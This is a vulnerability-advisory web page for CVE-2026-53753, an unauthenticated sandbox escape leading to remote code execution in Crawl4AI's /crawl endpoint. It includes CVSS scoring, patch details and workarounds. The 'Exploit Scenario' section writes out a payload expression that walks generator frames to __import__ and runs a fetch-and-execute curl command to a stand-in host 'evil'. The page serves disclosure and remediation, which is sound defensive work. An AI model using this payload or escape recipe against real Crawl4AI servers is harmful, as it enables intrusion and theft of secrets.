Skip to main content

Crawl4AI CVE-2026-53753

CRITICAL
Code Injection (CWE-94)
2026-06-16 https://github.com/unclecode/crawl4ai GHSA-qxjp-w3pj-48m7
Python Code Injection RCE Docker
9.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
9.8 CRITICAL

Network-reachable /crawl endpoint, single crafted JSON body, JWT off by default so PR:N, no user interaction, and RCE inside the container yields full C/I/A impact.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 16, 2026 - 20:50 vuln.today
Analysis Generated
Jun 16, 2026 - 20:50 vuln.today
CVE Published
Jun 16, 2026 - 20:13 github-advisory
CRITICAL 9.8

DescriptionGitHub Advisory

Summary

The _safe_eval_expression() function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore. Python generator and frame object attributes (gi_frame, f_back, f_builtins) do NOT start with underscore, enabling a complete sandbox escape to achieve arbitrary code execution.

The attack requires no authentication (JWT disabled by default) and is triggered via POST /crawl with a crafted extraction schema.

Attack Vector

An attacker sends a POST /crawl request with a JsonCssExtractionStrategy schema containing a malicious computed field expression that:

  1. Creates a generator to access gi_frame
  2. Walks the frame chain via f_back
  3. Reaches f_builtins containing the real __import__
  4. Imports os and executes arbitrary commands

Impact

Unauthenticated remote code execution inside the Docker container. An attacker can execute arbitrary system commands, read/write files, and exfiltrate secrets.

Fix Details

  1. Removed eval() from computed field expression path entirely -- expressions now log a warning and return default value
  2. Deleted _safe_eval_expression() function and _SAFE_EVAL_BUILTINS (dead security-sensitive code)
  3. function key with Python callables still works for SDK users
  4. Replaced eval() in /config/dump with JSON-based input validated by Pydantic
  5. Fixed hook_manager sandbox: stripped __builtins__, __loader__, __spec__ from injected modules; removed getattr, setattr, type, __build_class__ from allowed builtins

Workarounds

  1. Upgrade to the patched version (recommended)
  2. Enable JWT authentication via CRAWL4AI_API_TOKEN environment variable
  3. Restrict network access to the Docker API

Credits

  • Song Binglin (q1uf3ng) - reported the AST sandbox escape
  • by111 (August829) - reported the hook sandbox __builtins__ escape and hardcoded JWT secret bypass
  • jannahopp - PR #1855 proposing eval removal
  • ntohidi - PR #1886 proposing allowlist approach

Articles & Coverage 3

News 5 New Docker Vulnerabilities - 1 Critical, 4 High Severity Jun 17, 2026 News 6 New Python Vulnerabilities - 2 Critical, 4 High Severity Jun 17, 2026 News Critical RCE in Crawl4AI <= 0.8.6 via AST Sandbox Escape - CVE-2026-53753 Jun 16, 2026

AnalysisAI

Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in the computed fields feature by abusing Python generator frame attributes (gi_frame, f_back, f_builtins) that the validator failed to block. Because JWT authentication is disabled by default in the Docker API, any attacker reachable on the network can POST a crafted JsonCssExtractionStrategy schema to /crawl and execute arbitrary commands inside the container. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Discover exposed /crawl endpoint
Delivery
POST JsonCssExtractionStrategy with malicious computed expression
Exploit
Generator gi_frame walks f_back chain
Execution
Recover f_builtins __import__ and load os
Persist
Execute commands in Docker container
Impact
Exfiltrate secrets or pivot
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The target must be running crawl4ai <= 0.8.6 with the Docker / FastAPI HTTP server started and the /crawl endpoint reachable by the attacker; JWT must be disabled, which is the default state when CRAWL4AI_API_TOKEN is not set. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment All risk signals align toward high priority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker scans for exposed Crawl4AI Docker instances on the internet or internal network and sends a single POST /crawl request whose body includes a JsonCssExtractionStrategy schema with a computed field expression like (lambda g=(x for x in []): g.gi_frame.f_back.f_builtins['__import__']('os').system('curl evil/x|sh')). Because JWT is disabled by default and the AST validator never inspected non-underscore frame attributes, the expression is eval'd inside the container and the attacker gains code execution as the service user, enabling secret theft, lateral movement, and persistence. …
Remediation Vendor-released patch: upgrade crawl4ai to 0.8.7, which removes eval() from the computed-field path entirely (expressions now log a warning and return the field default), deletes _safe_eval_expression() and _SAFE_EVAL_BUILTINS, replaces eval() in /config/dump with Pydantic-validated JSON, and hardens the hook_manager sandbox by stripping __builtins__/__loader__/__spec__ from injected modules and removing getattr, setattr, type, and __build_class__ from allowed builtins (see PRs https://github.com/unclecode/crawl4ai/pull/1855 and https://github.com/unclecode/crawl4ai/pull/1886). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: identify all Crawl4AI instances and verify versions (≤0.8.6 are affected); restrict network access to the service. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL POC
9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
CVE-2026-20251 HIGH
8.8 Jun 10

Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil
CVE-2026-48519 CRITICAL
9.6 Jun 16

Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python co
CVE-2026-45833 CRITICAL
9.4 Jun 12

Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U
CVE-2026-48031 CRITICAL
9.1 Jun 10

Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) a

Share

CVE-2026-53753 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy